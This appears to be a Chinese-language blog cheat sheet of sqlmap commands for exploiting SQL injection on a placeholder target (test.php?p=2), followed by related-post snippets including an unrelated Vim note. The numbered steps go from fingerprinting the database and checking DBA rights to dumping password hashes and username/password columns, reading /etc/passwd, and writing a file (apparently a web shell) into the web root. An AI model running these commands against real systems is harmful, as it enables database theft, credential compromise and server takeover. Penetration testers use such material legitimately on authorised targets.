收藏:
以前整理的 方便查閱 有錯誤的指出順便注:文中部分是– 而不是—— (這個不是我不願意修改,而是**系統的問題,實在抱歉,請大家在複製語句之後手工修改。:) )
簡單的注入流程
1.讀取資料庫版本,當前使用者,當前資料庫
sqlmap -u test.php?p=2 -f -b –current-user –current-db -v 1
2.判斷當前資料庫使用者許可權
sqlmap -u test.php?p=2 –privileges -u 使用者名稱 -v 1
sqlmap -u test.php?p=2 –is-dba -u 使用者名稱 -v 1
3.讀取所有資料庫使用者或指定資料庫使用者的密碼
sqlmap -u test.php?p=2 –users –passwords -v 2
sqlmap -u test.php?p=2 –passwords -u root -v 2
4.獲取所有資料庫
sqlmap -u test.php?p=2 –dbs -v 2
5.獲取指定資料庫中的所有表
sqlmap -u test.php?p=2 –tables -d mysql -v 2
6.獲取指定資料庫名中指定表的字段
sqlmap -u test.php?p=2 –columns -d mysql -t users -v 2
7.獲取指定資料庫名中指定表中指定欄位的資料
sqlmap -u test.php?p=2 –dump -d mysql -t users -c 「username,password」 -s 「sqlnmapdb.log」 -v 2
8.file-read讀取web檔案
sqlmap -u test.php?p=2 –file-read 「/etc/passwd」 -v 2
9.file-write寫入檔案到web
sqlmap -u test.php?p=2 –file-write /localhost/mm.php –file-dest /var/www/html/xx.php -v 2
本文**bugcx blog 由網路安全攻防研究室(www.91ri.org)資訊保安小組收集整理。
sqlmap使用筆記
中文使用說明 sqlmap是一種開源的滲透測試工具,可以自動檢測和利用sql注入漏洞以及接入該資料庫的伺服器。它擁有非常強大的檢測引擎 具有多種特性的滲透測試器 通過資料庫指紋提取訪問底層檔案系統並通過外帶連線執行命令。支援的資料庫 mysql,oracle,postgresql,microsoft...
sqlmap使用筆記
sqlmap使用筆記 簡單的注入流程 1.讀取資料庫版本,當前使用者,當前資料庫 sqlmap u test.php?p 2 f b current user current db v 1 2.判斷當前資料庫使用者許可權 sqlmap u test.php?p 2 privileges u 使用者名...
Vim 使用筆記
set hlsearch set nohlsearch 搜尋後清除上次的加亮 nohl nohlsearch 拷貝 很有用的一句話,規定了格式選項,讓它換行不自動空格 set formatoptions tcrqn set fo r set noautoindent 再 shift insert 正...